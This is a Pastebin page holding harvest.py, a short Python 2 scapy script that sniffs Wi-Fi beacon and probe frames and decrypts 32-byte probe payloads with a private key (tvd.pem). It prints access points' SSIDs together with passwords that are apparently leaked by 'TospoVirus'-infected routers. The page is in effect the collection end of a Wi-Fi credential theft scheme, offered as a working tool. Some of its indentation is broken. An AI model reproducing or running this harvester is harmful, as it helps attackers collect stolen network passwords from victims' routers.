Advertisement
FlyFar

harvest.py

Jul 13th, 2023
547
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.19 KB | Cybersecurity | 0 0
  1. __author__ = 'catatonic'
  2. """
  3. harvest.py:
  4.    Identifies potential candidate packets for TospoVirus disclosed passwords.
  5. """
  6.  
  7. from scapy.all import *
  8. import urllib
  9. from subprocess import Popen
  10. import difflib
  11.  
  12. ap_list = {}
  13. def monitor(pkt):
  14.     if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 8:
  15.         if pkt.addr2 not in ap_list and len(pkt.info) > 0:
  16.             ap_list[pkt.addr2] = pkt.info
  17.             print "adding: %s %s" %(pkt.addr2, pkt.info)
  18.     if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 4 and len(pkt.info) == 32:
  19.     dec = Popen(['openssl', 'rsautl', '-decrypt', '-inkey', 'tvd.pem'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  20.     dec.stdin.write(pkt.info)
  21.     dec.stdin.close()
  22.     dec.wait()
  23.         rc = dec.returncode
  24.         if rc == 0:
  25.             for close_match in difflib.get_close_matches(pkt.addr2, ap_list):
  26.                 print "AP: %s\t\tGuessed SSID: %s\t\tPass: %s" %(pkt.addr2, ap_list[close_match], dec.stdout.readline())
  27.  
  28. if len(sys.argv) < 2:
  29.    print "Usage: sudo python harvest.py [monitor-iface]"
  30.    exit()
  31. conf.iface = sys.argv[1]
  32. print '[*] Monitoring on %s' %(sys.argv[1])
  33. sniff(prn=monitor, store=0)
Tags: identifier
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement